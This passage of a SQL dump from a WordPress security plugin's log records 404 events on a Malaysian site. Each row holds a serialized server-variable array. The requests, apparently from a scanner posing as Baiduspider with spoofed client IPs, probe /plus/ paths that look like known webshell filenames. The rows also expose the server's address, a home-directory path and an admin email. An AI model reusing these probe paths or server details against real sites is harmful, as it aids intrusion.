+http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"159.122.94.174\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/plus/mp.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/plus/mp.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YgRypZvX7@gJ12mO-nQAAAJI\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/plus/mp.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/plus/mp.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YgRypZvX7@gJ12mO-nQAAAJI\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/plus/mp.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/plus/mp.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6YgRypZvX7@gJ12mO-nQAAAJI\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"64406\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/plus/mp.php\";s:10:\"SCRIPT_URL\";s:12:\"/plus/mp.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6YgRypZvX7@gJ12mO-nQAAAJI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674818.0252\";s:12:\"REQUEST_TIME\";s:10:\"1570674818\";}}','notice','2019-10-10 02:33:40','2019-10-10 02:33:38',35056648,36860232,'https://bintara.com.my/plus/mp.php',1,0,'159.122.94.174'),(27834,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:59:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/plus/mowang.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:12:\"37.41.179.68\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=a938f2297a4381f1df0903cae71ad7ef\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"37.41.179.68\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/plus/mowang.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:16:\"/plus/mowang.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YeH6YXSDJF91Gv2PyaQAAABU\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/plus/mowang.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:16:\"/plus/mowang.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YeH6YXSDJF91Gv2PyaQAAABU\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/plus/mowang.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/plus/mowang.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6YeH6YXSDJF91Gv2PyaQAAABU\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"63991\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/plus/mowang.php\";s:10:\"SCRIPT_URL\";s:16:\"/plus/mowang.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6YeH6YXSDJF91Gv2PyaQAAABU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674808.5382\";s:12:\"REQUEST_TIME\";s:10:\"1570674808\";}}','notice','2019-10-10 02:33:30','2019-10-10 02:33:28',35056320,36863592,'https://bintara.com.my/plus/mowang.php',1,0,'37.41.179.68'),(27833,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:59:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/plus/moon.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:12:\"32.40.79.240\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=4e4aa77f5dd9955f92df18294952351b\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"32.40.79.240\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/plus/moon.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:14:\"/plus/moon.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6Yb@BT1onqG4TOWhlF@QAAARY\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/plus/moon.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:14:\"/plus/moon.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6Yb@BT1onqG4TOWhlF@QAAARY\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/plus/moon.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/plus/moon.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6Yb@BT1onqG4TOWhlF@QAAARY\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"63600\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/plus/moon.php\";s:10:\"SCRIPT_URL\";s:14:\"/plus/moon.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6Yb@BT1onqG4TOWhlF@QAAARY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674799.5343\";s:12:\"REQUEST_TIME\";s:10:\"1570674799\";}}','notice','2019-10-10 02:33:21','2019-10-10 02:33:19',35052816,36855312,'https://bintara.com.my/plus/moon.php',1,0,'32.40.79.240'),(27832,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:59:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/plus/md5.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:12:\"64.233.22.15\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=e267d9607bdf1d1256879835114260ba\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"64.233.22.15\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/plus/md5.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/plus/md5.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YZ@BT1onqG4TOWhlF9AAAAQk\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/plus/md5.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/plus/md5.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YZ@BT1onqG4TOWhlF9AAAAQk\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/plus/md5.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/plus/md5.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6YZ@BT1onqG4TOWhlF9AAAAQk\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"63217\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/plus/md5.php\";s:10:\"SCRIPT_URL\";s:13:\"/plus/md5.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6YZ@BT1onqG4TOWhlF9AAAAQk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674791.2831\";s:12:\"REQUEST_TIME\";s:10:\"1570674791\";}}','notice','2019-10-10 02:33:12','2019-10-10 02:33:11',35056152,36855592,'https://bintara.com.my/plus/md5.php',1,0,'64.233.22.15'),(27831,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:59:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/plus/mcds.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:14:\"125.28.105.219\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=6cf921e34f72df24f497d997887ed061\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"125.28.105.219\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/plus/mcds.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:14:\"/plus/mcds.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YXX6YXSDJF91Gv2PyZAAAAAM\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/plus/mcds.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:14:\"/plus/mcds.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YXX6YXSDJF91Gv2PyZAAAAAM\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/plus/mcds.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/plus/mcds.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6YXX6YXSDJF91Gv2PyZAAAAAM\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"62748\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/plus/mcds.php\";s:10:\"SCRIPT_URL\";s:14:\"/plus/mcds.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6YXX6YXSDJF91Gv2PyZAAAAAM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674781.4647\";s:12:\"REQUEST_TIME\";s:10:\"1570674781\";}}','notice','2019-10-10 02:33:03','2019-10-10 02:33:01',35053512,36855104,'https://bintara.com.my/plus/mcds.php',1,0,'125.28.105.219'),(27830,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:59:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/plus/m7lrv.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:13:\"217.1.202.147\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=94f3cc5ea4156c3a254f9257393dc4d3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"217.1.202.147\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/m7lrv.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/m7lrv.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YT@BT1onqG4TOWhlF5gAAARU\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/m7lrv.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/plus/m7lrv.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6YT@BT1onqG4TOWhlF5gAAARU\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/m7lrv.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/plus/m7lrv.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6YT@BT1onqG4TOWhlF5gAAARU\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"62350\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/plus/m7lrv.php\";s:10:\"SCRIPT_URL\";s:15:\"/plus/m7lrv.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6YT@BT1onqG4TOWhlF5gAAARU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674767.9814\";s:12:\"REQUEST_TIME\";s:10:\"1570674767\";}}','notice','2019-10-10 02:32:49','2019-10-10 02:32:48',35057352,36864208,'https://bintara.com.my/plus/m7lrv.php',1,0,'217.1.202.147'),(27829,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:59:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"/plus/laobiao.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:11:\"20.39.74.98\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=2fcdc263c01d17877bcdfca411a0fbf5\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; 